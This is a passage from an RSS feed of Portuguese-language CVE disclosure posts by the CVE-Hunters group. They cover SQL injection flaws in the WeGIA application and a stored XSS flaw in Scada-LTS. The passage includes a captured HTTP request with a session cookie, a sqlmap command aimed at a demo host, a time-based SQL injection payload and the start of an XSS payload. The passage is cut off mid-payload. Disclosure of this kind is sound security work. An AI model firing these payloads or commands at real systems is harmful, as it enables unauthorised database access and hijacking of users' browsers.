&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  POST /html/funcionario/dependente_editarDoc.php?id_pessoa=3&amp;amp;amp;idatendido_familiares=1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Length: 82
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Origin: https://demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g0$t1751259204$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  rg=56.242.1&amp;amp;amp;orgao_emissor=Uni%C3%A3o1&amp;amp;amp;data_expedicao=2005-06-06&amp;amp;amp;cpf=495.852.710-95
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Então, use o &amp;lt;code&amp;gt;sqlmap&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54061/image.png&amp;#34;
	width=&amp;#34;862&amp;#34;
	height=&amp;#34;755&amp;#34;
	srcset=&amp;#34;/p/cve-2025-54061/image_hu_fe6010bc9adac3a1.png 480w, /p/cve-2025-54061/image_hu_b23a08e91a8f8039.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;274px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54062</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54062/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54062/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54062-vulnerabilidade-de-injeção-sql-no-parâmetro-id_dependente-do-endpoint-profile_dependentephp&amp;#34;&amp;gt;CVE-2025-54062: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;profile_dependente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/profile_dependente.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54062-vulnerabilidade-de-injeção-sql-no-parâmetro-id_dependente-do-endpoint-profile_dependentephp&amp;#34;&amp;gt;CVE-2025-54062: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;profile_dependente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/profile_dependente.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/funcionario/profile_dependente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &#43;AND&#43;SLEEP(10)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54062/image.png&amp;#34;
	width=&amp;#34;1313&amp;#34;
	height=&amp;#34;775&amp;#34;
	srcset=&amp;#34;/p/cve-2025-54062/image_hu_d68ef2828ab64648.png 480w, /p/cve-2025-54062/image_hu_73d0afd25a2a62ee.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;169&amp;#34;
		data-flex-basis=&amp;#34;406px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7728</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7728/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7728/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7728-cross-site-scripting-xss-armazenado-no-endpoint-usersshtm-parâmetro-username&amp;#34;&amp;gt;CVE-2025-7728: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;  do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7728-cross-site-scripting-xss-armazenado-no-endpoint-usersshtm-parâmetro-username&amp;#34;&amp;gt;CVE-2025-7728: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;  do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Registre o payload no campo &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt; no endpoint &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;. Depois disso, o XSS pode ser acionado abrindo a página &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span 